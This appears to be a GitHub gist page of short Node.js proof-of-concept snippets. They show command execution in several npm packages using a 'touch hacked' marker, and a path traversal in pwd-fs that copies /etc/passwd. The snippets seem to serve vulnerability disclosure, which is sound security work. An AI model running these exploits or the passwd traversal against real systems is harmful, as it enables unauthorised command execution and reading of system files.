This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const superchild = require('superchild'); | |
superchild("touch hacked", {"shell": true}) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const execchainable = require('exec-chainable'); | |
execchainable("touch hacked"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const nodeseqexec = require('node-seq-exec'); | |
nodeseqexec(["touch hacked"], () => {}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const promisedexec = require('promised-exec'); | |
promisedexec("touch hacked") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const spawncommand = require('spawn-command'); | |
spawncommand("touch hacked", {}) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// must have a directory named dir/ in the same directory as poc.js | |
const PoweredFileSystem = require('pwd-fs'); | |
const pfs = new PoweredFileSystem(); | |
pfs.copy("../../../../../../../../../../etc/passwd", "./dir") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const exec = require("shelljs.exec"); | |
exec("touch hacked", {}) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const evalexp = require("eval-expression"); | |
console.log(evalexp("2+2")) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const shell = require('spawn-default-shell'); | |
shell.spawn("touch hacked", {}) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const execspawn = require('exec-spawn'); | |
execspawn("touch", ["hacked"], {}, () => {}); |
OlderNewer